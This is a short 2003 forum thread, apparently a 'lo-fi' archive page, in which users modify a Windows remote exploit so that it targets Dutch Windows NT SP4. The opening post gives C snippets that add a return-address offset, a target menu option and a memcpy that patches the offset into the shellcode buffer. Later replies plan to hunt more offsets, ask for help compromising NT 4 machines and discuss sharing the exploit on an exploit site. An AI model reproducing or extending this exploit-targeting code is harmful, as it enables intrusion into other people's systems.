ADD AN OFFSET FOR DUTCH OS:

/* Myam add OFFSETS*/
char winntsp4nl[] = "\xe5\x27\xf3\x77"; /* Dutch winNT sp4 */

AND AN OPTION FOR THE DUTCH OS:

printf("[<$>] 48 Winnt dutch sp4\n ");

AND TO FINISH IT:

else if (atoi(argv[4])==48)
memcpy(sc+36,winntsp4nl,sizeof(winntsp4nl));

If it would work, I'm gonna try finding offsets for all dutch operating systems...

woutiir

Aug 7 2003, 05:52 PM

Yeah!

Would rock if you put the dutch codes in it also (i'm dutch also) And if you ask me that's the right command indeed, let me know when finished (PM me for instance..) lemme know the results, i'll put it at K-otik so it'll be available there.

thnx again,
woutiir

edwinc

Aug 14 2003, 05:00 AM

Would you guys let me know if ur successful in compromising NT 4 machines?? Any help will be appreicated. Don't have time tonight do do some test, will do Nt sp5 tomorrow. I have to test a bunch of FFD3 addresess.

yuliang11

Aug 15 2003, 05:58 PM

cygwin is the best unix ported into windows C compiler.

totof

Aug 15 2003, 06:55 PM

u have compiled the source 48_target ?? because me i 'am a lot of erros

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.